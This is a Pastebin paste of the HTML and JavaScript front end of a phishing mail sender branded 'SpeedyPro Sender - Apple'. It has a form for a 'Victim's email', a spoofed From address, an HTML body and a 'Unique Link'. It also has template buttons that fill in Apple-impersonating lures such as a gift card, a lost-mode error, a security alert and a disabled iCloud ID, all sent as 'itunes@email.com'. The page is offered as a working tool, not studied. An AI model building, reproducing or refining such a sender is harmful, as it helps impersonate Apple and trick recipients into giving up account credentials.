Advertisement
Guest User

Untitled

a guest
Aug 10th, 2017
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.33 KB | None | 0 0
  1. <!DOCTYPE html>
  2.  
  3. <html lang="en">
  4. <head>
  5.  
  6. <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  7. <meta charset="utf-8">
  8. <title>iTunes | Speedy Pro sender</title>
  9. <meta name="generator" content="Bootply" />
  10. <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  11. <link href="../css/bootstrap.min.css" rel="stylesheet">
  12. <!--[if lt IE 9]>
  13. <script src="//html5shim.googlecode.com/svn/trunk/html5.js"></script>
  14. <![endif]-->
  15. <link href="../css/styles.css" rel="stylesheet">
  16. <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  17. <script src="../templates.js" ></script>
  18.  
  19.  
  20. <style>
  21. .button,.button1 {
  22. display: inline-block; border-radius: 4px; background-color: rgb(103, 103, 103);
  23. border: none; color: #FFFFFF; text-align: center; font-size: 15px; padding: 8px;
  24. transition: all 0.6s; cursor: pointer;
  25. }
  26.  
  27. .button:hover {
  28. background-color: #4CAF50;
  29. /* Green */ color: white;
  30. }
  31.  
  32. a:link {
  33. color: blue;
  34. }
  35.  
  36. a:visited {
  37. color: blue;
  38. }
  39.  
  40. .button1:hover {
  41. box-shadow: 0 12px 16px 0 rgba(0,0,0,0.24), 0 17px 50px 0 rgba(0,0,0,0.19);
  42. }
  43. </style>
  44.  
  45. </head>
  46. <body>
  47.  
  48.  
  49. <div style="width:650px;margin:50px auto;">
  50. <div class="panel panel-primary">
  51.  
  52. <div class="panel-heading">SpeedyPro Sender - Apple<span><a href="../../1234/index.html" style="color: white; margin-left: 25%; ">Home</a></span></div> <div class="panel-body" style="display: flex;">
  53. <!-- Sender Form -->
  54.  
  55. <div>
  56. <form action="" method="POST" id="form1">
  57. <input type="hidden" name="send">
  58.  
  59. <table style="width:400px;">
  60. <tr>
  61. <td>Victim's email: </td>
  62. <td><input type="email" class="form-control small" name="empfaenger" /></td>
  63. </tr>
  64. <tr>
  65. <td>Subject:</td>
  66. <td><input id="title" class="form-control small" type="text" name="betreff"/></td>
  67. </tr>
  68. <tr>
  69. <td>HTML code: </td>
  70. <td><textarea style="width:300px;height:450px;" name="inhalt" id="html" class="form-control small" ></textarea><br /></td>
  71. </tr>
  72. <tr>
  73. <td>From email: </td>
  74. <td><input id="sender" type="email" class="form-control small" name="sender" style="widows: 100%" /></td>
  75. </tr>
  76. <tr>
  77. <td>Unique Link</td>
  78. <td><input type="text" class="form-control small" name="uniquelink" id="uniquelink" style="widows: 100%" /></td>
  79. </tr>
  80. <tr>
  81. <td><br />
  82. <center><button type="submit" class="btn btn-primary button1" value="Send">Send</button></center>
  83. </td>
  84. </tr>
  85.  
  86. </table><br />
  87.  
  88. </form>
  89. </div>
  90.  
  91. <div style="width: 35%;padding: 5px;text-align: center;">
  92. <h4 style="text-decoration: underline;">Chose template</h4>
  93. <p><button id="itunes" onclick="itunesFxn()" class="button" style="vertical-align:middle">Gift card</button></p>
  94. <p><button id="errmode" onclick="errmodeFxn()" class="button" style="vertical-align:middle">Error Lost mode</button></p>
  95. <p><a id = "pstream" onclick = "pstreamFxn()"><button class="button" style="vertical-align:middle"><span>Photo stream</span></button> </a></p>
  96. <p><a id = "serror" onclick = "serrorFxn()"><button class="button" style="vertical-align:middle"><span>Security ALert</span></button> </a></p>
  97. <button class="button1" onClick="uniquelinkFxn();">Place unique link </button>
  98. </div>
  99.  
  100.  
  101. </div>
  102. </div>
  103. </div>
  104.  
  105. </body>
  106. </html>
  107.  
  108. <script type="text/javascript">
  109.  
  110. function uniquelinkFxn() {
  111. $('#html').val( $('#uniquelink').val().replace('html', 'test'));
  112. };
  113.  
  114. function itunesFxn(itunes) {
  115. var itunestemp = document.getElementById("title").value = "You received a gift card";
  116. var Description = document.getElementById("html").value = itunestemp;
  117. var Price = document.getElementById("sender").value = "itunes@email.com";
  118. };
  119.  
  120. function errmodeFxn(errmode) {
  121. var errrmode = document.getElementById("title").value = "Error putting device in lost mode";
  122. var Description = document.getElementById("html").value = errrmode;
  123. var Price = document.getElementById("sender").value = "itunes@email.com";
  124. };
  125.  
  126. function pstreamFxn(pstream) {
  127. var photo = document.getElementById("title").value = "Subscribe to Jordan's Photo";
  128. var Description = document.getElementById("html").value = photo;
  129. var Price = document.getElementById("sender").value = "itunes@email.com";
  130. };
  131.  
  132. function serrorFxn(serror) {
  133. var alert = document.getElementById("title").value = "Security Alert";
  134. var Description = document.getElementById("html").value = alert;
  135. var Price = document.getElementById("sender").value = "itunes@email.com";
  136. };
  137.  
  138. function serrorFxn(pstream) {
  139. var alert = document.getElementById("title").value = "iCLoud ID disabled";
  140. var Description = document.getElementById("html").value = alert;
  141. var Price = document.getElementById("sender").value = "itunes@email.com";
  142. };
  143.  
  144. document.body.innerHTML = document.body.innerHTML.replace('%%LINK%%', 'hi');
  145. </script>
  146.  
  147.  
  148. <script>
  149. (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  150. (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  151. m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  152. })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  153.  
  154. ga('create', 'UA-55007843-1', 'auto');
  155. ga('send', 'pageview');
  156. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement